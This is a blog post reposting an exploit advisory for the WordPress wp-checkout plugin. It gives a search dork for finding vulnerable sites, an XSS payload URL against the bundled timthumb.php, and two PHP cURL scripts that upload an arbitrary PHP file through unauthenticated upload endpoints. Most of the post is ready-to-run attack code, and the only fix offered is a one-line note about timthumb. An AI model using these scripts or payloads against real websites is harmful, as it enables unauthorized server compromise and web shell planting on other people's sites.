Halaman

Wordpress Plugin Wp-checkout Multiple Vulnerabilitie

Senin, 21 September 2015




#- Title : Wordpress Plugin wp-checkout XSS & Arbitrary File Upload
#- Author : DevilScreaM & Gastro-dz
#- Vendor : wordpress.org/extend/plugins/wordpress-checkout/
#- Date : 09/21/2015
#- Category : Web Applications
#- Type : PHP
#- Vulnerabillity : Arbitrary File Upload, XSS
#- Dork : inurl:wp-content/plugins/wp-checkout
#- Tested on : Vivid Vervet
---------------------------------------------------------------------------------

Proof Of Concept :


[ Cross Site Scripting ] Discover by DevilScreaM

http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]

Example :
http://Site.com/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>3xploi7</h1>

http://site.net/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>3xploi7</h1>


Solution :
Upgrade Version of Timthumb or Delete Files timthumb.php

----------------------------------------------------------------------------
[ Arbitrary File Upload ] Discover by DevilScreaM

Vulnerability :

 http://site.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php ( Discover by DevilScreaM)

<?php

$uploadfile="3xploi7.php";
$ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
          'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>



Result : Here

----------------------------------------------------------------------------



[ Uploadify ] Discover by Gastro-dz



Vulnerability :

http://site.com/wp-content/uploads/wp-checkout/uploadify/upload.php

<?php


$uploadfile="3xploi7.php";
$ch = curl_init("http://site.com/wp-content/uploads/wp-checkout/uploadify/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
          'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Result Here


Tidak ada komentar:

Posting Komentar